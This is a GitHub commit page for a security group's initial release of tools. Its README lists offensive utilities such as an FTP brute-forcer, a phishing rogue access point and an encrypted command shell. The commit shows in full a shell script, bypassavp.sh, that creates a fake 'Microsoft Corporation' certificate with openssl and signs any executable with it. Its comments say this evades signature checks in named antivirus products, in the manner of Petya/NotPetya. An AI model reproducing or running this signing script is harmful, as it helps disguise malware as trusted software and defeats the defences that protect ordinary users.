Skip to content

Commit 4cf8811

Browse files
Initial commit of public tool releases from Hacker House.
0 parents  commit 4cf8811

21 files changed

+222
-0
lines changed

ApacheProbe.zip

7.87 KB
Binary file not shown.

CryptCmd.zip

1.55 MB
Binary file not shown.

DSIHello.tgz

16.5 KB
Binary file not shown.

FTPCracker.rar

3.17 MB
Binary file not shown.

FTPScanner.rar

3.17 MB
Binary file not shown.

README.md

Lines changed: 29 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,29 @@
1+
# tools
2+
3+
Utilities and tools created during computer security research activities by the team at Hacker House.
4+
5+
| Filename | Description |
6+
| :--- | :--- |
7+
| *android-malware-grabber.tgz* | Android emulator tool to download new malware from the web |
8+
| *ApacheProbe.zip* | tool to perform Apache userdir enumeration (ASM) |
9+
| *bypassavp.sh* | Sign an executable with a fake Microsoft certificate to evade PSP |
10+
| *combipass.tar.gz* | Creates combination files for password cracking from textfiles |
11+
| *CryptCmd.zip* | SSL encrypted command shell tool for Windows |
12+
| *diceware.tgz* | diceware password generation tool |
13+
| *DSIHello.tgz* | Apple DSI protocol enumeration tool (Apple File Sharing) |
14+
| *elf-bintools.tgz* | ELF binary tools
15+
| *FTPCracker.rar* | FTP server brute-force tool (GUI)
16+
| *FTPScanner.rar* | FTP mass-scanner tool (GUI)
17+
| *mac-teensyduino.txt* | OS-X 10.6.5 teensyduino command shell injection tool |
18+
| *net-tools.tgz* | PHP tools for common network enumeration |
19+
| *nsediscover-kali.py* | Nmap script discovery tool (kali edition) |
20+
| *nsediscover.py* | Nmap script discovery tool (Linux) |
21+
| *rebirth.ipa* | Apple IOS 11.3.x jailbreak tool with SSH |
22+
| *rfsniff.tgz* | HackRF complex signal baseband tool (ncurses) |
23+
| *rogueap.tgz* | LinkSys router malicious access point for phishing |
24+
| *rosetta.db* | Rosetta Stone database in SQLite format for UNIX administrators |
25+
| *SCRABBLE-wordlist.tgz* | Scrabble dictionary wordlist for password cracking |
26+
| *spybot-0.3a.zip* | IRC monitoring chat bot for "NSA" type capabiltiies |
27+
28+
These files are available under a Attribution-NonCommercial-NoDerivatives 4.0 International license.
29+

SCRABBLE-wordlist.tgz

3 MB
Binary file not shown.

android-malware-grabber.tgz

671 Bytes
Binary file not shown.

bypassavp.sh

Lines changed: 21 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,21 @@
1+
#!/bin/sh
2+
# Sign an executable with a fake Microsoft certificate to evade PSP
3+
# Uses a fake Microsoft certificate as exploited by Petya/NotPetya
4+
# ransomware to bypass signature (not heuristic) checks on the following
5+
# AvP products:
6+
# * TrendMicro
7+
# * Webroot
8+
# * Malwarebytes
9+
# * Arcabit
10+
# * Zonealarm
11+
# * Kaspersky
12+
#
13+
# Use with AppName Exe and enter password on the prompt. Requires
14+
# mono framework installed to use "codesign" on Linux.
15+
#
16+
# e.g. ./bypass.sh SomeApp server.exe
17+
openssl req -x509 -newkey rsa:4096 -keyout fake_microsoft_key.pem -out fake_microsoft_cert.pem -days 365 -subj "/C=US/ST=Washington/L=Redmond/O=Microsoft Corporation/OU=MOPR/CN=Microsoft Corporation"
18+
openssl rsa -in fake_microsoft_key.pem -outform PVK -pvk-strong -out authenticode.pvk
19+
openssl crl2pkcs7 -nocrl -certfile fake_microsoft_cert.pem -outform DER -out authenticode.spc
20+
signcode -spc authenticode.spc -v authenticode.pvk -a sha1 -\$ commercial -n $1 -i http://www.microsoft.com/ -i http://timestamp.verisign.com/scripts/timestamp.dll -tr 10 $2
21+

combipass.tar.gz

9.23 KB
Binary file not shown.

0 commit comments

Comments
 (0)